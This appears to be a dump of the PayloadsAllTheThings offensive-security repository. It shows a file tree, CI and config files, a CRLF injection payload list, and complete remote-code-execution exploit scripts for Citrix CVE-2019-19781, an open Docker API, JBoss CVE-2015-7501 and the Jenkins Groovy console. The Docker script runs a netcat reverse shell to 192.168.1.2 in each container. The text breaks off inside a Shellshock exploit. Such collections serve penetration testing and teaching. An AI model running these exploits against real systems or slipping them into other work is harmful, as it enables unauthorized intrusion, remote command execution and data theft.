├── .github
    ├── .markdownlint.json
    ├── FUNDING.yml
    ├── banner.png
    ├── hopla_config.json
    ├── overrides
    │   └── main.html
    └── workflows
    │   ├── check-markdown.yml
    │   └── mkdocs-build.yml
├── .gitignore
├── API Key Leaks
    ├── Files
    │   └── MachineKeys.txt
    ├── IIS-Machine-Keys.md
    └── README.md
├── Account Takeover
    ├── README.md
    └── mfa-bypass.md
├── Business Logic Errors
    └── README.md
├── CONTRIBUTING.md
├── CORS Misconfiguration
    └── README.md
├── CRLF Injection
    ├── Files
    │   └── crlfinjection.txt
    └── README.md
├── CSV Injection
    └── README.md
├── CVE Exploits
    ├── Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
    ├── Apache Struts 2 CVE-2017-9805.py
    ├── Apache Struts 2 CVE-2018-11776.py
    ├── Citrix CVE-2019-19781.py
    ├── Docker API RCE.py
    ├── Drupalgeddon2 CVE-2018-7600.rb
    ├── Heartbleed CVE-2014-0160.py
    ├── JBoss CVE-2015-7501.py
    ├── Jenkins CVE-2015-8103.py
    ├── Jenkins CVE-2016-0792.py
    ├── Jenkins Groovy Console.py
    ├── Log4Shell.md
    ├── README.md
    ├── Rails CVE-2019-5420.rb
    ├── Shellshock CVE-2014-6271.py
    ├── Telerik CVE-2017-9248.py
    ├── Telerik CVE-2019-18935.py
    ├── Tomcat CVE-2017-12617.py
    ├── WebLogic CVE-2016-3510.py
    ├── WebLogic CVE-2017-10271.py
    ├── WebLogic CVE-2018-2894.py
    ├── WebSphere CVE-2015-7450.py
    └── vBulletin RCE 5.0.0 - 5.5.4.sh
├── Clickjacking
    └── README.md
├── Client Side Path Traversal
    └── README.md
├── Command Injection
    ├── Intruder
    │   ├── command-execution-unix.txt
    │   └── command_exec.txt
    └── README.md
├── Cross-Site Request Forgery
    ├── Images
    │   └── CSRF-CheatSheet.png
    └── README.md
├── DISCLAIMER.md
├── DNS Rebinding
    └── README.md
├── DOM Clobbering
    └── README.md
├── Denial of Service
    └── README.md
├── Dependency Confusion
    └── README.md
├── Directory Traversal
    ├── Intruder
    │   ├── deep_traversal.txt
    │   ├── directory_traversal.txt
    │   ├── dotdotpwn.txt
    │   └── traversals-8-deep-exotic-encoding.txt
    └── README.md
├── External Variable Modification
    └── README.md
├── File Inclusion
    ├── Files
    │   ├── LFI2RCE.py
    │   ├── phpinfolfi.py
    │   └── uploadlfi.py
    ├── Intruders
    │   ├── BSD-files.txt
    │   ├── JHADDIX_LFI.txt
    │   ├── LFI-FD-check.txt
    │   ├── LFI-WindowsFileCheck.txt
    │   ├── Linux-files.txt
    │   ├── List_Of_File_To_Include.txt
    │   ├── List_Of_File_To_Include_NullByteAdded.txt
    │   ├── Mac-files.txt
    │   ├── Traversal.txt
    │   ├── Web-files.txt
    │   ├── Windows-files.txt
    │   ├── dot-slash-PathTraversal_and_LFI_pairing.txt
    │   ├── php-filter-iconv.txt
    │   └── simple-check.txt
    ├── LFI-to-RCE.md
    ├── README.md
    └── Wrappers.md
├── Google Web Toolkit
    └── README.md
├── GraphQL Injection
    ├── Images
    │   └── htb-help.png
    └── README.md
├── HTTP Parameter Pollution
    └── README.md
├── Headless Browser
    ├── README.md
    └── files
    │   ├── iframe.html
    │   └── window_location_js.html
├── Hidden Parameters
    └── README.md
├── Insecure Deserialization
    ├── DotNET.md
    ├── Files
    │   ├── Ruby_universal_gadget_generate_verify.rb
    │   ├── node-serialize.js
    │   └── ruby-serialize.yaml
    ├── Images
    │   └── NETNativeFormatters.png
    ├── Java.md
    ├── Node.md
    ├── PHP.md
    ├── Python.md
    ├── README.md
    └── Ruby.md
├── Insecure Direct Object References
    ├── Images
    │   └── idor.png
    └── README.md
├── Insecure Management Interface
    ├── Intruder
    │   └── springboot_actuator.txt
    └── README.md
├── Insecure Randomness
    └── README.md
├── Insecure Source Code Management
    ├── Bazaar.md
    ├── Files
    │   └── github-dorks.txt
    ├── Git.md
    ├── Mercurial.md
    ├── README.md
    └── Subversion.md
├── JSON Web Token
    └── README.md
├── Java RMI
    └── README.md
├── LDAP Injection
    ├── Intruder
    │   ├── LDAP_FUZZ.txt
    │   ├── LDAP_FUZZ_SMALL.txt
    │   └── LDAP_attributes.txt
    └── README.md
├── LICENSE
├── LaTeX Injection
    └── README.md
├── Mass Assignment
    └── README.md
├── Methodology and Resources
    ├── Active Directory Attack.md
    ├── Bind Shell Cheatsheet.md
    ├── Cloud - AWS Pentest.md
    ├── Cloud - Azure Pentest.md
    ├── Cobalt Strike - Cheatsheet.md
    ├── Container - Docker Pentest.md
    ├── Container - Kubernetes Pentest.md
    ├── Escape Breakout.md
    ├── HTML Smuggling.md
    ├── Hash Cracking.md
    ├── Initial Access.md
    ├── Linux - Evasion.md
    ├── Linux - Persistence.md
    ├── Linux - Privilege Escalation.md
    ├── MSSQL Server - Cheatsheet.md
    ├── Metasploit - Cheatsheet.md
    ├── Methodology and enumeration.md
    ├── Network Discovery.md
    ├── Network Pivoting Techniques.md
    ├── Office - Attacks.md
    ├── Powershell - Cheatsheet.md
    ├── Reverse Shell Cheatsheet.md
    ├── Source Code Management.md
    ├── Vulnerability Reports.md
    ├── Web Attack Surface.md
    ├── Windows - AMSI Bypass.md
    ├── Windows - DPAPI.md
    ├── Windows - Defenses.md
    ├── Windows - Download and Execute.md
    ├── Windows - Mimikatz.md
    ├── Windows - Persistence.md
    ├── Windows - Privilege Escalation.md
    └── Windows - Using credentials.md
├── NoSQL Injection
    ├── Intruder
    │   ├── MongoDB.txt
    │   └── NoSQL.txt
    └── README.md
├── OAuth Misconfiguration
    └── README.md
├── ORM Leak
    └── README.md
├── Open Redirect
    ├── Intruder
    │   ├── Open-Redirect-payloads.txt
    │   ├── open_redirect_wordlist.txt
    │   └── openredirects.txt
    └── README.md
├── Prompt Injection
    └── README.md
├── Prototype Pollution
    └── README.md
├── README.md
├── Race Condition
    └── README.md
├── Regular Expression
    └── README.md
├── Request Smuggling
    └── README.md
├── SAML Injection
    ├── Images
    │   ├── SAML-xml-flaw.png
    │   └── XSLT1.jpg
    └── README.md
├── SQL Injection
    ├── BigQuery Injection.md
    ├── Cassandra Injection.md
    ├── DB2 Injection.md
    ├── Images
    │   ├── PostgreSQL_cmd_exec.png
    │   ├── Unicode_SQL_injection.png
    │   └── wildcard_underscore.jpg
    ├── Intruder
    │   ├── Auth_Bypass.txt
    │   ├── Auth_Bypass2.txt
    │   ├── FUZZDB_MSSQL-WHERE_Time.txt
    │   ├── FUZZDB_MSSQL.txt
    │   ├── FUZZDB_MSSQL_Enumeration.txt
    │   ├── FUZZDB_MYSQL.txt
    │   ├── FUZZDB_MySQL-WHERE_Time.txt
    │   ├── FUZZDB_MySQL_ReadLocalFiles.txt
    │   ├── FUZZDB_Oracle.txt
    │   ├── FUZZDB_Postgres_Enumeration.txt
    │   ├── Generic_ErrorBased.txt
    │   ├── Generic_Fuzz.txt
    │   ├── Generic_TimeBased.txt
    │   ├── Generic_UnionSelect.txt
    │   ├── SQL-Injection
    │   ├── SQLi_Polyglots.txt
    │   ├── payloads-sql-blind-MSSQL-INSERT
    │   ├── payloads-sql-blind-MSSQL-WHERE
    │   ├── payloads-sql-blind-MySQL-INSERT
    │   ├── payloads-sql-blind-MySQL-ORDER_BY
    │   └── payloads-sql-blind-MySQL-WHERE
    ├── MSSQL Injection.md
    ├── MySQL Injection.md
    ├── OracleSQL Injection.md
    ├── PostgreSQL Injection.md
    ├── README.md
    ├── SQLite Injection.md
    └── SQLmap.md
├── Server Side Include Injection
    ├── Files
    │   └── ssi_esi.txt
    └── README.md
├── Server Side Request Forgery
    ├── Files
    │   ├── SSRF_expect.svg
    │   ├── SSRF_url.svg
    │   ├── ip.py
    │   ├── ssrf_ffmpeg.avi
    │   ├── ssrf_iframe.svg
    │   ├── ssrf_svg_css_import.svg
    │   ├── ssrf_svg_css_link.svg
    │   ├── ssrf_svg_css_xmlstylesheet.svg
    │   ├── ssrf_svg_image.svg
    │   └── ssrf_svg_use.svg
    ├── Images
    │   ├── Parser and Curl less than 7.54.png
    │   ├── SSRF_PDF.png
    │   ├── SSRF_Parser.png
    │   ├── SSRF_stream.png
    │   ├── WeakParser.jpg
    │   └── aws-cli.jpg
    ├── README.md
    ├── SSRF-Advanced-Exploitation.md
    └── SSRF-Cloud-Instances.md
├── Server Side Template Injection
    ├── ASP.md
    ├── Images
    │   ├── serverside.png
    │   └── template-library.jpg
    ├── Intruder
    │   └── ssti.fuzz
    ├── Java.md
    ├── JavaScript.md
    ├── PHP.md
    ├── Python.md
    ├── README.md
    └── Ruby.md
├── Tabnabbing
    └── README.md
├── Type Juggling
    ├── Images
    │   └── table_representing_behavior_of_PHP_with_loose_type_comparisons.png
    └── README.md
├── Upload Insecure Files
    ├── CVE FFmpeg HLS
    │   ├── gen_avi_bypass.py
    │   ├── gen_xbin_avi.py
    │   ├── read_passwd.avi
    │   ├── read_passwd_bypass.mp4
    │   ├── read_shadow.avi
    │   └── read_shadow_bypass.mp4
    ├── CVE ZIP Symbolic Link
    │   ├── etc_passwd.zip
    │   ├── generate.sh
    │   └── passwd
    ├── Configuration Apache .htaccess
    │   ├── .htaccess
    │   ├── .htaccess_phpinfo
    │   ├── .htaccess_rce_files
    │   ├── .htaccess_shell
    │   └── README.md
    ├── Configuration IIS web.config
    │   └── web.config
    ├── Configuration Python __init__.py
    │   ├── python-admin-__init__.py.zip
    │   ├── python-conf-__init__.py.zip
    │   ├── python-config-__init__.py.zip
    │   ├── python-controllers-__init__.py.zip
    │   ├── python-generate-init.py
    │   ├── python-login-__init__.py.zip
    │   ├── python-models-__init__.py.zip
    │   ├── python-modules-__init__.py.zip
    │   ├── python-scripts-__init__.py.zip
    │   ├── python-settings-__init__.py.zip
    │   ├── python-tests-__init__.py.zip
    │   ├── python-urls-__init__.py.zip
    │   ├── python-utils-__init__.py.zip
    │   └── python-view-__init__.py.zip
    ├── Configuration uwsgi.ini
    │   └── uwsgi.ini
    ├── EICAR
    │   └── eicar.txt
    ├── Extension ASP
    │   ├── shell.asa
    │   ├── shell.ashx
    │   ├── shell.asmx
    │   ├── shell.asp
    │   ├── shell.aspx
    │   ├── shell.cer
    │   ├── shell.soap
    │   └── shell.xamlx
    ├── Extension HTML
    │   └── xss.html
    ├── Extension PHP
    │   ├── extensions.lst
    │   ├── php-script-tag.php
    │   ├── phpinfo.jpg.php
    │   ├── phpinfo.phar
    │   ├── phpinfo.php
    │   ├── phpinfo.php3
    │   ├── phpinfo.php4
    │   ├── phpinfo.php5
    │   ├── phpinfo.php7
    │   ├── phpinfo.php8
    │   ├── phpinfo.phpt
    │   ├── phpinfo.pht
    │   ├── phpinfo.phtml
    │   ├── shell.gif^shell.php
    │   ├── shell.jpeg.php
    │   ├── shell.jpg.php
    │   ├── shell.jpg^shell.php
    │   ├── shell.pgif
    │   ├── shell.phar
    │   ├── shell.php
    │   ├── shell.php3
    │   ├── shell.php4
    │   ├── shell.php5
    │   ├── shell.php7
    │   ├── shell.phpt
    │   ├── shell.pht
    │   ├── shell.phtml
    │   ├── shell.png.php
    │   ├── shell.png^shell.php
    │   └── tiny.php
    ├── Images
    │   └── file-upload-mindmap.png
    ├── Jetty RCE
    │   └── JettyShell.xml
    ├── Picture Compression
    │   ├── GIF_exploit.gif
    │   ├── JPG_exploit-55.jpg
    │   ├── PNG_110x110_resize_bypass_use_LFI.png
    │   ├── PNG_32x32_resize_bypass_use_LFI.png
    │   ├── createBulletproofJPG.py
    │   ├── createCompressedPNG_110x110.php
    │   ├── createGIFwithGlobalColorTable.php
    │   └── createPNGwithPLTE.php
    ├── Picture ImageMagick
    │   ├── convert_local_etc_passwd.svg
    │   ├── convert_local_etc_passwd_html.svg
    │   ├── ghostscript_rce_curl.jpg
    │   ├── imagemagick_CVE-2022-44268_convert_etc_passwd.png
    │   ├── imagemagick_ghostscript_cmd_exec.pdf
    │   ├── imagemagik_ghostscript_reverse_shell.jpg
    │   ├── imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg
    │   ├── imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg
    │   ├── imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
    │   ├── imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png
    │   ├── imagetragik1_payload_imageover_wget.gif
    │   ├── imagetragik1_payload_url_bind_shell_nc.mvg
    │   ├── imagetragik1_payload_url_curl.png
    │   ├── imagetragik1_payload_url_portscan.jpg
    │   ├── imagetragik1_payload_url_remote_connection.mvg
    │   ├── imagetragik1_payload_url_reverse_shell_bash.mvg
    │   ├── imagetragik1_payload_url_touch.jpg
    │   ├── imagetragik1_payload_xml_reverse_shell_nctraditional.xml
    │   ├── imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml
    │   ├── imagetragik2_burpcollaborator_passwd.jpg
    │   ├── imagetragik2_centos_id.jpg
    │   ├── imagetragik2_ubuntu_id.jpg
    │   ├── imagetragik2_ubuntu_shell.jpg
    │   └── imagetragik2_ubuntu_shell2.jpg
    ├── Picture Metadata
    │   ├── Build_image_to_LFI.py
    │   ├── CVE-2021-22204_exiftool_echo.jpg
    │   ├── CVE-2021-22204_exiftool_revshell.jpg
    │   ├── PHP_exif_phpinfo.jpg
    │   ├── PHP_exif_system.gif
    │   ├── PHP_exif_system.jpg
    │   └── PHP_exif_system.png
    ├── README.md
    └── Server Side Include
    │   ├── exec.shtml
    │   ├── include.shtml
    │   └── index.stm
├── Web Cache Deception
    ├── Images
    │   └── wcd.jpg
    ├── Intruders
    │   └── param_miner_lowercase_headers.txt
    └── README.md
├── Web Sockets
    ├── Files
    │   └── ws-harness.py
    ├── Images
    │   ├── WebsocketHarness.jpg
    │   ├── sqlmap.png
    │   └── websocket-harness-start.png
    └── README.md
├── XPATH Injection
    └── README.md
├── XSLT Injection
    ├── Files
    │   ├── enum-system-version-vendor.xsl
    │   ├── file-write.xsl
    │   ├── rce-dotnet-2.xsl
    │   ├── rce-dotnet.xsl
    │   ├── rce-java-1.xsl
    │   ├── rce-java-2.xsl
    │   ├── rce-php-assert.xsl
    │   ├── rce-php-file-create.xsl
    │   ├── rce-php-file-read.xsl
    │   ├── rce-php-meterpreter.xsl
    │   ├── rce-php-scandir.xsl
    │   ├── read-and-ssrf.xsl
    │   ├── system-properties.xml
    │   ├── system-properties.xsl
    │   └── xxe.xsl
    └── README.md
├── XSS Injection
    ├── 1 - XSS Filter Bypass.md
    ├── 2 - XSS Polyglot.md
    ├── 3 - XSS Common WAF Bypass.md
    ├── 4 - CSP Bypass.md
    ├── 5 - XSS in Angular.md
    ├── Files
    │   ├── InsecureFlashFile.swf
    │   ├── JupyterNotebookXSS.ipynb
    │   ├── SVG_XSS1.svg
    │   ├── SVG_XSS2.svg
    │   ├── SVG_XSS3.svg
    │   ├── SVG_XSS_green_triangle.svg
    │   ├── SVG_XSS_nested_img_xlink.svg
    │   ├── SVG_XSS_nested_svg.svg
    │   ├── SVG_XSS_nested_use_xlink.svg
    │   ├── SVG_XSS_red_lightning.svg
    │   ├── SWF_XSS.swf
    │   ├── mouseover-xss-ecs.jpeg
    │   ├── onclick-xss-ecs.jpeg
    │   ├── payload_in_all_known_exif_corrupted.jpg
    │   ├── payload_in_all_known_exif_corrupted.png
    │   ├── payload_in_all_known_metadata.jpg
    │   ├── payload_in_all_known_metadata.png
    │   ├── payload_text_xss.png
    │   ├── xml.xsd
    │   ├── xss.cer
    │   ├── xss.dtd
    │   ├── xss.htm
    │   ├── xss.html.demo
    │   ├── xss.hxt
    │   ├── xss.mno
    │   ├── xss.rdf
    │   ├── xss.svgz
    │   ├── xss.url.url
    │   ├── xss.vml
    │   ├── xss.wsdl
    │   ├── xss.xht
    │   ├── xss.xhtml
    │   ├── xss.xml
    │   ├── xss.xsd
    │   ├── xss.xsf
    │   ├── xss.xsl
    │   ├── xss.xslt
    │   ├── xss_comment_exif_metadata_double_quote.png
    │   └── xss_comment_exif_metadata_single_quote.png
    ├── Images
    │   └── DwrkbH1VAAErOI2.jpg
    ├── Intruders
    │   ├── 0xcela_event_handlers.txt
    │   ├── BRUTELOGIC-XSS-JS.txt
    │   ├── BRUTELOGIC-XSS-STRINGS.txt
    │   ├── IntrudersXSS.txt
    │   ├── JHADDIX_XSS.txt
    │   ├── MarioXSSVectors.txt
    │   ├── RSNAKE_XSS.txt
    │   ├── XSSDetection.txt
    │   ├── XSS_Polyglots.txt
    │   ├── jsonp_endpoint.txt
    │   ├── port_swigger_xss_cheatsheet_event_handlers.txt
    │   ├── xss_alert.txt
    │   ├── xss_alert_identifiable.txt
    │   ├── xss_payloads_quick.txt
    │   └── xss_swf_fuzz.txt
    └── README.md
├── XXE Injection
    ├── Files
    │   ├── Classic XXE - etc passwd.xml
    │   ├── Classic XXE B64 Encoded.xml
    │   ├── Classic XXE.xml
    │   ├── Deny Of Service - Billion Laugh Attack
    │   ├── XXE OOB Attack (Yunusov, 2013).xml
    │   └── XXE PHP Wrapper.xml
    ├── Intruders
    │   ├── XXE_Fuzzing.txt
    │   └── xml-attacks.txt
    └── README.md
├── Zip Slip
    └── README.md
├── _LEARNING_AND_SOCIALS
    ├── BOOKS.md
    ├── TWITTER.md
    └── YOUTUBE.md
├── _template_vuln
    └── README.md
├── custom.css
└── mkdocs.yml


/.github/.markdownlint.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "default": true,
 3 |     "MD013": false,
 4 |     "no-duplicate-heading": {
 5 |       "siblings_only": true
 6 |     },
 7 |     "ul-indent": {
 8 |       "indent": 4
 9 |     }
10 | }


--------------------------------------------------------------------------------
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | # These are supported funding model platforms
2 | github: swisskyrepo
3 | ko_fi: swissky
4 | custom: https://www.buymeacoffee.com/swissky


--------------------------------------------------------------------------------
/.github/banner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/.github/banner.png


--------------------------------------------------------------------------------
/.github/overrides/main.html:
--------------------------------------------------------------------------------
 1 | {% extends "base.html" %}
 2 | 
 3 | {% block content %}
 4 | 	{{ super() }}
 5 |   <div class="social-container">
 6 |     <b>Share this content</b>
 7 |     <div class="a2a_kit a2a_kit_size_32 a2a_default_style">
 8 |       <a class="a2a_dd" href="https://www.addtoany.com/share"></a>
 9 |       <a class="a2a_button_x"></a>
10 |       <a class="a2a_button_telegram"></a>
11 |       <a class="a2a_button_linkedin"></a>
12 |       <a class="a2a_button_email"></a>
13 |       <a class="a2a_button_microsoft_teams"></a>
14 |     </div>
15 |     <br>
16 |     <script async src="https://static.addtoany.com/menu/page.js"></script>
17 |     <script defer src="https://cloud.umami.is/script.js" data-website-id="82be5164-e1f3-4cb0-bd22-20e02086d3d4"></script>
18 |   </div>
19 | {% endblock %}
20 | 
21 | {% block styles %}
22 | 	{{ super() }}
23 |   <style>
24 |   .social-container {
25 |     float: right;
26 |   }
27 |   </style>
28 | {% endblock %}


--------------------------------------------------------------------------------
/.github/workflows/check-markdown.yml:
--------------------------------------------------------------------------------
 1 | name: check-markdown
 2 | on: [push, pull_request]
 3 | 
 4 | jobs:
 5 |   lint:
 6 |     runs-on: ubuntu-latest
 7 |     steps:
 8 |     - uses: actions/checkout@v4
 9 |       with:
10 |         fetch-depth: 0
11 | 
12 |     - uses: tj-actions/changed-files@v45
13 |       id: changed-files
14 |       with:
15 |         files: '**/*.md'
16 |         separator: ","
17 |         
18 |     - uses: DavidAnson/markdownlint-cli2-action@v17
19 |       if: steps.changed-files.outputs.any_changed == 'true'
20 |       with:
21 |         globs: ${{ steps.changed-files.outputs.all_changed_files }}
22 |         separator: ","
23 |         config: ./.github/.markdownlint.json


--------------------------------------------------------------------------------
/.github/workflows/mkdocs-build.yml:
--------------------------------------------------------------------------------
 1 | name: mkdocs-build 
 2 | on:
 3 |   push:
 4 |     branches:
 5 |       - master
 6 | 
 7 | jobs:
 8 |   deploy:
 9 |     runs-on: ubuntu-latest
10 |     steps:
11 |       - uses: actions/checkout@v2
12 |         with:
13 |           submodules: recursive
14 | 
15 |       # Checks-out submodules
16 |       - uses: actions/checkout@v2
17 |       - name: Checkout submodules
18 |         shell: bash
19 |         run: |
20 |           git config --global user.email "no-reply@github.com"
21 |           git config --global user.name "Swk"
22 |           git config --global pull.rebase false
23 |           git submodule add https://github.com/swisskyrepo/PayloadsAllTheThings/ docs
24 |           mv docs/.github/overrides .
25 | 
26 |       - uses: actions/setup-python@v2
27 |         with:
28 |           python-version: 3.x
29 |       - run: pip install mkdocs-material
30 |       - run: pip install mkdocs-git-revision-date-localized-plugin
31 |       - run: pip install mkdocs-git-committers-plugin
32 |       - run: pip install mkdocs-material[imaging]
33 |       - run: pip install mdx_truly_sane_lists
34 |       - run: mkdocs gh-deploy --force
35 | 
36 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | BuildPDF/
2 | .vscode
3 | .todo


--------------------------------------------------------------------------------
/CRLF Injection/Files/crlfinjection.txt:
--------------------------------------------------------------------------------
 1 | /%%0a0aSet-Cookie:crlf=injection
 2 | /%0aSet-Cookie:crlf=injection
 3 | /%0d%0aSet-Cookie:crlf=injection
 4 | /%0dSet-Cookie:crlf=injection
 5 | /%23%0aSet-Cookie:crlf=injection
 6 | /%23%0d%0aSet-Cookie:crlf=injection
 7 | /%23%0dSet-Cookie:crlf=injection
 8 | /%25%30%61Set-Cookie:crlf=injection
 9 | /%25%30aSet-Cookie:crlf=injection
10 | /%250aSet-Cookie:crlf=injection
11 | /%25250aSet-Cookie:crlf=injection
12 | /%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
13 | /%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
14 | /%2F..%0d%0aSet-Cookie:crlf=injection
15 | /%3f%0d%0aSet-Cookie:crlf=injection
16 | /%3f%0dSet-Cookie:crlf=injection
17 | /%u000aSet-Cookie:crlf=injection
18 | 


--------------------------------------------------------------------------------
/CVE Exploits/Citrix CVE-2019-19781.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # https://github.com/mpgn/CVE-2019-19781
 3 | # # #
 4 | 
 5 | import requests
 6 | import string
 7 | import random
 8 | import re
 9 | import sys
10 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
11 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
12 | 
13 | print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
14 | print("Found by Mikhail Klyuchnikov")
15 | print("")
16 | 
17 | if len(sys.argv) < 2:
18 |   print("[-] No URL provided")
19 |   sys.exit(0)
20 | 
21 | while True:
22 |     try:
23 |       command = input("command > ")
24 | 
25 |       random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
26 |       print("[+] Adding bookmark", random_xml + ".xml")
27 | 
28 |       burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
29 |       burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
30 |                       random_xml, "NSC_NONCE": "c", "Connection": "close"}
31 |       burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
32 |       r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)
33 | 
34 |       if r.status_code == 200:
35 |         print("[+] Bookmark added")
36 |       else:
37 |         print("\n[-] Target not vulnerable or something went wrong")
38 |         sys.exit(0)
39 | 
40 |       burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
41 |       burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
42 |                        random_xml, "NSC_NONCE": "c", "Connection": "close"}
43 |       r = requests.get(burp0_url, headers=burp0_headers,verify=False)
44 | 
45 |       replaced = re.sub('^&#.*&#10;$', '', r.text, flags=re.MULTILINE)
46 |       print("[+] Result of the command: \n")
47 |       print(replaced)
48 | 
49 |     except KeyboardInterrupt:
50 |             print("Exiting...")
51 |             break


--------------------------------------------------------------------------------
/CVE Exploits/Docker API RCE.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function
 2 | import requests
 3 | import logging
 4 | import json
 5 | import urllib.parse
 6 | 
 7 | # NOTE
 8 | # Enable Remote API with the following command
 9 | # /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
10 | # This is an intended feature, remember to filter the port 2375..
11 | 
12 | name          = "docker"
13 | description   = "Docker RCE via Open Docker API on port 2375"
14 | author        = "Swissky"
15 | 
16 | # Step 1 - Extract id and name from each container
17 | ip   = "127.0.0.1"
18 | port = "2375"
19 | data = "containers/json"
20 | url  = "http://{}:{}/{}".format(ip, port, data)
21 | r = requests.get(url)
22 | 
23 | if r.json:
24 |     for container in r.json():
25 |         container_id   = container['Id']
26 |         container_name = container['Names'][0].replace('/','')
27 |         print((container_id, container_name))
28 | 
29 |         # Step 2 - Prepare command
30 |         cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]'
31 |         data = "containers/{}/exec".format(container_name)
32 |         url = "http://{}:{}/{}".format(ip, port, data)
33 |         post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }'
34 |         post_header = {
35 |             "Content-Type": "application/json"
36 |         }
37 |         r = requests.post(url, json=json.loads(post_json))
38 | 
39 | 
40 |         # Step 3 - Execute command
41 |         id_cmd = r.json()['Id']
42 |         data = "exec/{}/start".format(id_cmd)
43 |         url = "http://{}:{}/{}".format(ip, port, data)
44 |         post_json = '{ "Detach":false,"Tty":false}'
45 |         post_header = {
46 |             "Content-Type": "application/json"
47 |         }
48 |         r = requests.post(url, json=json.loads(post_json))
49 |         print(r)


--------------------------------------------------------------------------------
/CVE Exploits/JBoss CVE-2015-7501.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python2
 2 | 
 3 | # Jboss Java Deserialization RCE (CVE-2015-7501)
 4 | # Made with <3 by @byt3bl33d3r
 5 | 
 6 | from __future__ import print_function
 7 | import requests
 8 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
 9 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
10 | 
11 | import argparse
12 | import sys, os
13 | #from binascii import hexlify, unhexlify
14 | from subprocess import check_output
15 | 
16 | ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
17 | ysoserial_path = None
18 | 
19 | parser = argparse.ArgumentParser()
20 | parser.add_argument('target', type=str, help='Target IP')
21 | parser.add_argument('command', type=str, help='Command to run on target')
22 | parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
23 | parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
24 | 
25 | if len(sys.argv) < 2:
26 |     parser.print_help()
27 |     sys.exit(1)
28 | 
29 | args = parser.parse_args()
30 | 
31 | if not args.ysoserial_path:
32 |     for path in ysoserial_default_paths:
33 |         if os.path.exists(path):
34 |             ysoserial_path = path
35 | else:
36 |     if os.path.exists(args.ysoserial_path):
37 |         ysoserial_path = args.ysoserial_path
38 | 
39 | if ysoserial_path is None:
40 |     print('[-] Could not find ysoserial JAR file')
41 |     sys.exit(1)
42 | 
43 | if len(args.target.split(":")) != 2:
44 |     print('[-] Target must be in format IP:PORT')
45 |     sys.exit(1)
46 | 
47 | if not args.command:
48 |     print('[-] You must specify a command to run')
49 |     sys.exit(1)
50 | 
51 | ip, port = args.target.split(':')
52 | 
53 | print('[*] Target IP: {}'.format(ip))
54 | print('[*] Target PORT: {}'.format(port))
55 | 
56 | gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
57 | 
58 | r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
59 | 
60 | if r.status_code == 200:
61 |     print('[+] Command executed successfully')
62 | 
63 | 


--------------------------------------------------------------------------------
/CVE Exploits/Jenkins Groovy Console.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py
 3 | # DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b
 4 | from __future__ import print_function
 5 | from builtins import input
 6 | import requests
 7 | import sys
 8 | 
 9 | print("""
10 | Jenkins Groovy Console cmd runner.
11 | 
12 | usage: ./jgc.py [HOST]
13 | 
14 | Then type any command and wait for STDOUT output from remote machine.
15 | Type 'exit' to exit :)
16 | """)
17 | URL = sys.argv[1] + '/scriptText'
18 | HEADERS = {
19 |     'User-Agent': 'jgc'
20 | }
21 | 
22 | while 1:
23 |     CMD = input(">> Enter command to execute (or type 'exit' to exit): ")
24 |     if CMD == 'exit':
25 |         print("exiting...\n")
26 |         exit(0)
27 | 
28 |     DATA = {
29 |         'script': 'println "{}".execute().text'.format(CMD)
30 |     }
31 |     result = requests.post(URL, headers=HEADERS, data=DATA)
32 |     print(result.text)


--------------------------------------------------------------------------------
/CVE Exploits/Shellshock CVE-2014-6271.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | # Successful Output:
 4 | # # python shell_shocker.py <VulnURL>
 5 | # [+] Attempting Shell_Shock - Make sure to type full path
 6 | # ~$ /bin/ls /
 7 | # bin
 8 | # boot
 9 | # dev
10 | # etc
11 | # ..
12 | # ~$ /bin/cat /etc/passwd
13 | 
14 | from __future__ import print_function
15 | from future import standard_library
16 | standard_library.install_aliases()
17 | from builtins import input
18 | import sys, urllib.request, urllib.error, urllib.parse
19 | 
20 | if len(sys.argv) != 2:
